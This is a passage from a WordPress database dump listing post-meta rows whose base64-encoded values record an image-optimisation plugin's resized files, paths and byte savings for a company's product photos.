dGltZSI6MTQ4MzU5MTEyMSwiaWQiOjUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NlbnNvci0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NlbnNvci0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NlbnNvci0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTEyMywiaWQiOjUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2Vuc29yLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2Vuc29yLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2Vuc29yLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0LCJ0aW1lIjoxNDgzNTkxMTI1LCJpZCI6NTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zZW5zb3ItMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zZW5zb3ItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zZW5zb3ItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTExMjcsImlkIjo1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NlbnNvci0yNDd4MjI4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NlbnNvci0yNDd4MjI4LmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMjI4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NlbnNvci0yNDd4MjI4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTEyOSwiaWQiOjUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2Vuc29yLTMwMHgyMjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2Vuc29yLTMwMHgyMjguanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIyMjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2Vuc29yLTMwMHgyMjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMTMxLCJpZCI6NTN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30401, 52, 'wpfc_optimisation_reduction', '54223'); 
INSERT INTO `wp_postmeta` VALUES (30402, 52, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHVtcHMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9wdW1wcy5qcGciLCJ3aWR0aCI6MzAwLCJoZWlnaHQiOjMyOCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3B1bXBzLmpwZyIsInJlZHVjdGlvbiI6NTQyMTYsInRpbWUiOjE0ODM1OTExMzgsImlkIjoiNTIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3B1bXBzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHVtcHMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9wdW1wcy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE0MCwiaWQiOjUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3B1bXBzLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHVtcHMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9wdW1wcy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE0MiwiaWQiOjUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3B1bXBzLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHVtcHMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9wdW1wcy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE0NCwiaWQiOjUyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHVtcHMtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9wdW1wcy0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3B1bXBzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMTQ2LCJpZCI6NTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9wdW1wcy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3B1bXBzLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcHVtcHMtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTExNDgsImlkIjo1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3B1bXBzLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHVtcHMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9wdW1wcy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE1MCwiaWQiOjUyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcHVtcHMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9wdW1wcy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3B1bXBzLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMTUzLCJpZCI6NTJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30403, 51, 'wpfc_optimisation_reduction', '66694'); 
INSERT INTO `wp_postmeta` VALUES (30404, 51, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbmVlZGxlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbmVlZGxlLmpwZyIsIndpZHRoIjo1OTAsImhlaWdodCI6MjUwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbmVlZGxlLmpwZyIsInJlZHVjdGlvbiI6NjY2ODQsInRpbWUiOjE0ODM1OTExNjAsImlkIjoiNTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL25lZWRsZS0zNDB4MjUwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL25lZWRsZS0zNDB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL25lZWRsZS0zNDB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE2MiwiaWQiOjUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL25lZWRsZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL25lZWRsZS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL25lZWRsZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE2NCwiaWQiOjUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL25lZWRsZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL25lZWRsZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL25lZWRsZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE2NiwiaWQiOjUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL25lZWRsZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL25lZWRsZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL25lZWRsZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE2OCwiaWQiOjUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL25lZWRsZS01MTB4MjUwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL25lZWRsZS01MTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL25lZWRsZS01MTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE3MSwiaWQiOjUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbmVlZGxlLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbmVlZGxlLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbmVlZGxlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMTczLCJpZCI6NTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9uZWVkbGUtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9uZWVkbGUtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9uZWVkbGUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTExNzUsImlkIjo1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL25lZWRsZS0yNDd4MjUwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL25lZWRsZS0yNDd4MjUwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMjUwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL25lZWRsZS0yNDd4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE3NywiaWQiOjUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbmVlZGxlLTMwMHgyNTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbmVlZGxlLTMwMHgyNTAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIyNTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbmVlZGxlLTMwMHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMTc5LCJpZCI6NTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9uZWVkbGUtNDAweDI1MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9uZWVkbGUtNDAweDI1MC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjI1MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9uZWVkbGUtNDAweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTExODEsImlkIjo1MX1d'); 
INSERT INTO `wp_postmeta` VALUES (30405, 49, 'wpfc_optimisation_reduction', '85939'); 
INSERT INTO `wp_postmeta` VALUES (30406, 49, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsbGx1YmUuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsbHViZS5qcGciLCJ3aWR0aCI6NDUwLCJoZWlnaHQiOjMwMSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21pbGxsdWJlLmpwZyIsInJlZHVjdGlvbiI6ODU5MzAsInRpbWUiOjE0ODM1OTExODksImlkIjoiNDkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGxsdWJlLTM0MHgzMDEuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozMDEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsbGx1YmUtMzQweDMwMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxsbHViZS0zNDB4MzAxLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE5MSwiaWQiOjQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGxsdWJlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsbGx1YmUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxsbHViZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE5MywiaWQiOjQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGxsdWJlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsbGx1YmUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxsbHViZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE5NSwiaWQiOjQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGxsdWJlLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsbGx1YmUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxsbHViZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTE5NywiaWQiOjQ5fSx7InVybCI6Imh0dHBzO